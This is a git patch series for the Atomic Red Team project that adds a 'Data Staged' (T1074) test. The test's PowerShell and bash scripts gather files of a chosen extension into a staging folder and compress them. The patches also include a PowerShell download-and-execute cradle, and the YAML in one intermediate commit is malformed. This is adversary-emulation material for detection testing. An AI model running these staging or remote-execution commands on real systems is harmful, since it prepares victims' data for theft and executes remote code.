From 1845c6fe17c7d1eab480385e7585d67466652da4 Mon Sep 17 00:00:00 2001
From: nicholasaleks <nicholas.aleks@gmail.com>
Date: Thu, 12 Jul 2018 00:21:01 -0400
Subject: [PATCH 1/4] T1074/collect-n-compress-file-types: Outlined a new
 collection > data staged attack type (collect n compress file types) within
 the T1074.md readme. Also raised a few questions on best practices

---
 atomics/T1074/T1074.md | 75 ++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 75 insertions(+)

diff --git a/atomics/T1074/T1074.md b/atomics/T1074/T1074.md
index f6f8183511..325d66eb64 100644
--- a/atomics/T1074/T1074.md
+++ b/atomics/T1074/T1074.md
@@ -15,6 +15,7 @@ Data Sources: File monitoring, Process monitoring, Process command-line paramete
 ## Atomic Tests
 
 - [Atomic Test #1 - Stage data from Discovery.bat](#atomic-test-1---stage-data-from-discoverybat)
+- [Atomic Test #2 - Collect all files extensions and stage within a compressed directory](#atomic-test-1---compress-all-file-types)
 
 
 <br/>
@@ -30,3 +31,77 @@ Utilize powershell to download discovery.bat and save to a local file
 powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log
 ```
 <br/>
+<hr/>
+<br/>
+
+## Atomic Test #2 - Collect and Compress all file types
+Collect all specified file extensions recursively from a specified file path on the target machine. All located files are copied into a temporary location before being compressed.
+
+**Supported Platforms:**
+- Windows
+- Linux
+
+
+#### Run it with `powershell`!
+Note:
+- ```{{ path }}```: requires a default path to start recursive search from
+- ```{{ extension }}```: requires a file extension to search for
+
+```
+$FolderPath = '{{ path }}'
+$FileExtension = '{{ extension }}'
+
+New-Item -ItemType directory -Path C:\temp\staging
+
+function TestPath()  
+{ 
+    $FileExists = Test-Path $FolderPath 
+    If ($FileExists -eq $True)  
+    { 
+        Return $true 
+    } 
+    Else  
+    { 
+        Return $false 
+    } 
+}
+
+function ZipFiles()
+{
+   Add-Type -Assembly System.IO.Compression.FileSystem
+   $compressionLevel = [System.IO.Compression.CompressionLevel]::Optimal
+   [System.IO.Compression.ZipFile]::CreateFromDirectory("C:\temp\staging",
+        "C:\temp\staging.zip", $compressionLevel, $false)
+}
+ 
+$Result = (TestPath($FolderPath)); 
+ 
+If ($Result) 
+{ 
+    $Dir = get-childitem $FolderPath -Recurse -ErrorAction Ignore 
+    $List = $Dir | where {$_.extension -eq $FileExtension} 
+    $List | Copy-Item -Destination C:\temp\staging\ -ErrorAction Ignore
+} 
+else 
+{ 
+    "Folder path is incorrect." 
+}
+
+ZipFiles
+
+Remove-Item -Recurse -Force C:\temp\staging
+
+```
+
+#### Run it with `bash`!
+Note:
+- ```{{ path }}```: requires a default path to start recursive search from
+- ```{{ extension }}```: requires a file extension to search for
+
+```
+mkdir -p /tmp/staging
+find {{ path }} -name '*{{ extension }}' -exec cp -prv '{}' '/tmp/staging' ';'
+tar -zcvf /tmp/staging.tar.gz /tmp/staging/
+rm -rf /tmp/staging
+```
+<br/>

From fab7677f2de9eb3fee46d98cdb408f8b8f91a0e0 Mon Sep 17 00:00:00 2001
From: nicholasaleks <nicholas.aleks@gmail.com>
Date: Thu, 12 Jul 2018 00:21:47 -0400
Subject: [PATCH 2/4] T1074/collect-n-compress-file-types: Yamlized the attack
 (again raising questions in comments about best practices)

---
 atomics/T1074/T1074.yaml | 97 ++++++++++++++++++++++++++++++++++++++++
 1 file changed, 97 insertions(+)

diff --git a/atomics/T1074/T1074.yaml b/atomics/T1074/T1074.yaml
index 14c3dd2ad3..a83ae60ea3 100644
--- a/atomics/T1074/T1074.yaml
+++ b/atomics/T1074/T1074.yaml
@@ -7,8 +7,105 @@ atomic_tests:
   description: |
     Utilize powershell to download discovery.bat and save to a local file
 
+  supported_platforms:---
+attack_technique: T1074
+display_name: Data Staged
+
+atomic_tests:
+- name: Stage data from Discovery.bat
+  description: |
+    Utilize powershell to download discovery.bat and save to a local file
+
+  supported_platforms:
+    - windows
+
+  executor:
+    name: powershell
+    command: |
+      powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log
+
+- name: Collect and Compress all file types
+  description: |
+    Collect all specified file extensions recursively from a specified file path on the target machine. All located files are copied into a temporary location before being compressed.
+
+  # Not sure if atomic-red supports multi-platform executors under a single attack name
+  # It would be nice to correlate (- windows: powershell executor && - linux: sh executor)
   supported_platforms:
     - windows
+    - linux
+
+  input_arguments:
+    extension:
+      description: Extensions to search for
+      type: String
+      default: .log
+
+  input_arguments:
+    path:
+      description: Path to recursively search from
+      type: Path
+      default: /
+
+  # Windows Payload
+  # Not sure if multi-line commands support powershell functions or if this would be better placed
+  # within an 'atomics/T1074/payload/windows-payload.ps1' file and utilize a (New-Object Net.WebClient).DownloadString
+  # to pull down the payload. (Not sure how to pass input arguments though)
+  executor:
+    name: powershell
+    command: |
+      $FolderPath = '{{ path }}'
+      $FileExtension = '{{ extension }}'
+
+      New-Item -ItemType directory -Path C:\temp\staging
+
+      function TestPath()  
+      { 
+          $FileExists = Test-Path $FolderPath 
+          If ($FileExists -eq $True)  
+          { 
+              Return $true 
+          } 
+          Else  
+          { 
+              Return $false 
+          } 
+      }
+
+      function ZipFiles()
+      {
+         Add-Type -Assembly System.IO.Compression.FileSystem
+         $compressionLevel = [System.IO.Compression.CompressionLevel]::Optimal
+         [System.IO.Compression.ZipFile]::CreateFromDirectory("C:\temp\staging",
+              "C:\temp\staging.zip", $compressionLevel, $false)
+      }
+       
+      $Result = (TestPath($FolderPath)); 
+       
+      If ($Result) 
+      { 
+          $Dir = get-childitem $FolderPath -Recurse -ErrorAction Ignore 
+          $List = $Dir | where {$_.extension -eq $FileExtension} 
+          $List | Copy-Item -Destination C:\temp\staging\ -ErrorAction Ignore
+      } 
+      else 
+      { 
+          "Folder path is incorrect." 
+      }
+
+      ZipFiles
+
+      Remove-Item -Recurse -Force C:\temp\staging
+
+  # Linux Payload
+  executor:
+    name: sh
+    command: |
+      mkdir -p /tmp/staging
+      find {{ path }} -name '*{{ extension }}' -exec cp -prv '{}' '/tmp/staging' ';'
+      tar -zcvf /tmp/staging.tar.gz /tmp/staging/
+      rm -rf /tmp/staging
+
+    - windows
 
   executor:
     name: powershell

From ceb9e59afe37c3b41cd0798e8098ea755c94c396 Mon Sep 17 00:00:00 2001
From: nicholasaleks <nicholas.aleks@gmail.com>
Date: Thu, 12 Jul 2018 00:25:34 -0400
Subject: [PATCH 3/4] T1074/collect-n-compress-file-types: Fixed yaml errors in
 T1074

---
 atomics/T1074/T1074.yaml | 16 ----------------
 1 file changed, 16 deletions(-)

diff --git a/atomics/T1074/T1074.yaml b/atomics/T1074/T1074.yaml
index a83ae60ea3..6cf634dee5 100644
--- a/atomics/T1074/T1074.yaml
+++ b/atomics/T1074/T1074.yaml
@@ -2,15 +2,6 @@
 attack_technique: T1074
 display_name: Data Staged
 
-atomic_tests:
-- name: Stage data from Discovery.bat
-  description: |
-    Utilize powershell to download discovery.bat and save to a local file
-
-  supported_platforms:---
-attack_technique: T1074
-display_name: Data Staged
-
 atomic_tests:
 - name: Stage data from Discovery.bat
   description: |
@@ -104,10 +95,3 @@ atomic_tests:
       find {{ path }} -name '*{{ extension }}' -exec cp -prv '{}' '/tmp/staging' ';'
       tar -zcvf /tmp/staging.tar.gz /tmp/staging/
       rm -rf /tmp/staging
-
-    - windows
-
-  executor:
-    name: powershell
-    command: |
-      powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log

From 86342935669476599fccfb9538d4d50347cd9da6 Mon Sep 17 00:00:00 2001
From: nicholasaleks <nicholas.aleks@gmail.com>
Date: Thu, 12 Jul 2018 00:33:42 -0400
Subject: [PATCH 4/4] T1074/collect-n-compress-file-types: Updated typos in
 atomic test #2

---
 atomics/T1074/T1074.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/atomics/T1074/T1074.md b/atomics/T1074/T1074.md
index 325d66eb64..e03012079b 100644
--- a/atomics/T1074/T1074.md
+++ b/atomics/T1074/T1074.md
@@ -15,7 +15,7 @@ Data Sources: File monitoring, Process monitoring, Process command-line paramete
 ## Atomic Tests
 
 - [Atomic Test #1 - Stage data from Discovery.bat](#atomic-test-1---stage-data-from-discoverybat)
-- [Atomic Test #2 - Collect all files extensions and stage within a compressed directory](#atomic-test-1---compress-all-file-types)
+- [Atomic Test #2 - Collect and Compress all file types](#atomic-test-2---collect-and-compress-all-file-types)
 
 
 <br/>